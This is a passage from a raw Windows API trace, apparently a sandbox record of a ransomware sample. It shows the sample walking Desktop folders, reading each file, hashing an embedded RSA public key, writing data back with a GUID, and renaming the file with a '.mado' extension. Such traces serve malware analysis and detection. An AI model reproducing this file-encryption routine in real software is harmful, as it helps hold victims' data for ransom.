Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe640 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0205.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe628 | out: hHeap=0x2c0000) returned 1 [0205.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0205.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe658 | out: hHeap=0x2c0000) returned 1 [0205.011] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14db6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.011] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0205.011] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.011] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.011] CloseHandle (hObject=0x63c) returned 1 [0205.013] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\FeFVDggLljOT82m.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz1h4qiinwnf\\fefvdgglljot82m.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\FeFVDggLljOT82m.flv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz1h4qiinwnf\\fefvdgglljot82m.flv.mado")) returned 1 [0205.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.013] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.014] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda69ebb0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0xcc7f6a80, ftLastAccessTime.dwHighDateTime=0x1d5e26e, ftLastWriteTime.dwLowDateTime=0xcc7f6a80, ftLastWriteTime.dwHighDateTime=0x1d5e26e, nFileSizeHigh=0x0, nFileSizeLow=0x14db6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FeFVDggLljOT82m.flv", cAlternateFileName="FEFVDG~1.FLV")) returned 0 [0205.014] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0205.015] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.015] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.015] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\") returned="zUdwhkJ\\" [0205.015] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0205.015] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.015] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.015] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.015] PathFindFileNameW (pszPath="") returned="" [0205.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528b3090, ftCreationTime.dwHighDateTime=0x1d5dedd, ftLastAccessTime.dwLowDateTime=0x75fa4430, ftLastAccessTime.dwHighDateTime=0x1d5da8c, ftLastWriteTime.dwLowDateTime=0x75fa4430, ftLastWriteTime.dwHighDateTime=0x1d5da8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.016] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528b3090, ftCreationTime.dwHighDateTime=0x1d5dedd, ftLastAccessTime.dwLowDateTime=0x75fa4430, ftLastAccessTime.dwHighDateTime=0x1d5da8c, ftLastWriteTime.dwLowDateTime=0x75fa4430, ftLastWriteTime.dwHighDateTime=0x1d5da8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.016] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21688590, ftCreationTime.dwHighDateTime=0x1d5e4d6, ftLastAccessTime.dwLowDateTime=0xbaaeef80, ftLastAccessTime.dwHighDateTime=0x1d5dcd1, ftLastWriteTime.dwLowDateTime=0xbaaeef80, ftLastWriteTime.dwHighDateTime=0x1d5dcd1, nFileSizeHigh=0x0, nFileSizeLow=0x13bb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7DIaYrya0lfH8Miq2Up.wav", cAlternateFileName="7DIAYR~1.WAV")) returned 1 [0205.016] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7DIaYrya0lfH8Miq2Up.wav") returned=".wav" [0205.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\7DIaYrya0lfH8Miq2Up.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zudwhkj\\7diayrya0lfh8miq2up.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.017] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=80825) returned 1 [0205.017] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.019] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13b93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.019] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.021] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.021] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x13bb9, lpOverlapped=0x0) returned 1 [0205.021] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.022] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.022] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.022] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.022] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.023] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.023] GetLastError () returned 0x0 [0205.023] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.023] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.023] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.023] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.023] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13bc0) returned 0x3b81690 [0205.023] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81110 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0205.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81158 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe640 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.024] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe640 | out: hHeap=0x2c0000) returned 1 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe640 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe610 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe5f8 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0205.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe640 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.025] GetCurrentThreadId () returned 0x600 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68348 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66390 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.025] GetCurrentThreadId () returned 0x600 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0205.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66498 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe640 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe670 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0205.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 